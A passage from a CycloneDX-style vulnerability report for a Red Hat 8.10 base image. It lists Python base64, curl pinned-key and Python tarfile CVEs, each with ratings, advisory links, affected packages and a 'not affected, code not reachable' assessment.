          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-12781",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "cwes": [
        704
      ],
      "description": "When passing data to the b64decode(), standard_b64decode(), and urlsafe_b64decode() functions in the \"base64\" module the characters \"+/\" will always be accepted, regardless of the value of \"altchars\" parameter, typically used to establish an \"alternative base64 alphabet\" such as the URL safe alphabet. This behavior matches what is recommended in earlier base64 RFCs, but newer RFCs now recommend either dropping characters outside the specified base64 alphabet or raising an error. The old behavior has the possibility of causing data integrity issues.\n\n\n\n\nThis behavior can only be insecure if your application uses an alternate base64 alphabet (without \"+/\"). If your application does not use the \"altchars\" parameter or the urlsafe_b64decode() function, then your application does not use an alternative base64 alphabet.\n\n\n\n\nThe attached patches DOES NOT make the base64-decode behavior raise an error, as this would be a change in behavior and break existing programs. Instead, the patch deprecates the behavior which will be replaced with the newly recommended behavior in a future version of Python.\u00a0Users are recommended to mitigate by verifying user-controlled inputs match the base64 \nalphabet they are expecting or verify that their application would not be \naffected if the b64decode() functions accepted \"+\" or \"/\" outside of altchars.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-12781"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-12781"
        },
        {
          "url": "https://github.com/python/cpython/commit/13360efd385d1a7d0659beba03787ea3d063ef9b"
        },
        {
          "url": "https://github.com/python/cpython/commit/1be80bec7960f5ccd059e75f3dfbd45fca302947"
        },
        {
          "url": "https://github.com/python/cpython/commit/9060b4abbe475591b6230b23c2afefeff26fcca5"
        },
        {
          "url": "https://github.com/python/cpython/commit/e95e783dff443b68e8179fdb57737025bf02ba76"
        },
        {
          "url": "https://github.com/python/cpython/commit/fd17ee026fa9b67f6288cbafe374a3e479fe03a5"
        },
        {
          "url": "https://github.com/python/cpython/issues/125346"
        },
        {
          "url": "https://github.com/python/cpython/pull/141128"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/KRI7GC6S27YV5NJ4FPDALS2WI5ENAFJ6/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12781"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-12781"
        }
      ],
      "published": "2026-01-21T20:16:04+00:00",
      "updated": "2026-06-17T08:32:56+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-13034",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        295
      ],
      "description": "When using `CURLOPT_PINNEDPUBLICKEY` option with libcurl or `--pinnedpubkey`\nwith the curl tool,curl should check the public key of the server certificate\nto verify the peer.\n\nThis check was skipped in a certain condition that would then make curl allow\nthe connection without performing the proper check, thus not noticing a\npossible impostor. To skip this check, the connection had to be done with QUIC\nwith ngtcp2 built to use GnuTLS and the user had to explicitly disable the\nstandard certificate verification.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-13034"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-13034"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-13034.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-13034.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-9r76-qj98-jfhc"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13034"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-13034"
        }
      ],
      "published": "2026-01-08T10:15:45+00:00",
      "updated": "2026-06-17T08:33:24+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-13462",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        20,
        74,
        434
      ],
      "description": "The \"tarfile\" module would still apply normalization of AREGTYPE (\\x00) blocks to DIRTYPE, even while processing a multi-block member such as GNUTYPE_LONGNAME or GNUTYPE_LONGLINK. This could result in a crafted tar archive being misinterpreted by the tarfile module compared to other implementations.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-13462"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-13462"
        },
        {
          "url": "https://github.com/python/cpython/commit/42d754e34c06e57ad6b8e7f92f32af679912d8ab"
        },
        {
          "url": "https://github.com/python/cpython/commit/72dde1016493c52abe857fc4a7bf6c40138b4114"
        },
        {
          "url": "https://github.com/python/cpython/commit/7ad3093d76a748af55bdb1d2e8aad3638163b017"
        },
        {
          "url": "https://github.com/python/cpython/commit/9a23b753552afa28e3a2f4d8863572fc66479406"
        },
        {
          "url": "https://github.com/python/cpython/commit/ae99fe3a33b43e303a05f012815cef60b611a9c7"
        },
        {
          "url": "https://github.com/python/cpython/commit/d10950739a78f54d0718d88fb5a868374603c084"
        },
        {
          "url": "https://github.com/python/cpython/issues/141707"
        },
        {
          "url": "https://github.com/python/cpython/pull/143934"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/EOMI5I66ZMKQ2INNFT6T7IAIKUGPZYIE/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13462"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8509-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-13462"
        }
      ],
      "published": "2026-03-12T18:16:21+00:00",
      "updated": "2026-08-13T01:16:50+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
